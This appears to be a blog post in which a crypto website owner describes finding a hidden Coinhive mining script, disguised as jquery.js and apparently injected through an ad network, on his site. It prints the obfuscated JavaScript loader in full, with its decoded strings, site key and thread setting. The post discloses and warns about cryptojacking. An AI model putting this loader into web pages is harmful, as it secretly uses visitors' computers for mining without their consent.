One of the side projects I run is a website about cryptocurrencies. I focus mainly on profiling the most prominent coins and offering objective information. It’s mostly a hobby, but I opted for monetizing it using niche ads so it can pay for itself.
A well-known crypto ad network contacted and offered me a decent deal. It was all going well until a few weeks ago. I had installed a browser extension called minerBlock just out of curiosity. I was surprised to learn that my own website was running a Coinhive script in the background.
I did notice a while back that my CPU usage would spike when I had my website open. I thought it was due to the several tabs I had running simultaneously and never made the connection to a possible mining script.
My website doesn’t run any external scripts except for the one that loaded the ads on my homepage.
Yet, I was infected with a sneaky Coinhive injection that disguised itself as a jquery.js file.
Here's the relevant code if anyone is interested:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];
function loadScript(_0xca68x2, _0xca68x3) {
var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
_0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
_0xca68x4[_0x7a2c[4]] = _0xca68x2;
_0xca68x4[_0x7a2c[5]] = _0xca68x3;
_0xca68x4[_0x7a2c[6]] = _0xca68x3;
document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
threads: 4
});
_0xca68x5[_0x7a2c[11]]()
});
If you decode var _0x7a2c using a service like Hexdecoder, you'll get this:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
If you don't know what Coinhive is, here's a good write up by @fiserman.
To be clear, I have nothing against Coinhive. However, I do have a problem if you're using it to mine cryptocurrencies on random people's computers without their consent.
I won’t disclose the ad network because I can’t effectively prove they did it. The sneaky bastards.
Nonetheless, if you run a website or even if you visit those websites very often, I encourage you to use a browser extension like the one I mentioned.
Be safe,
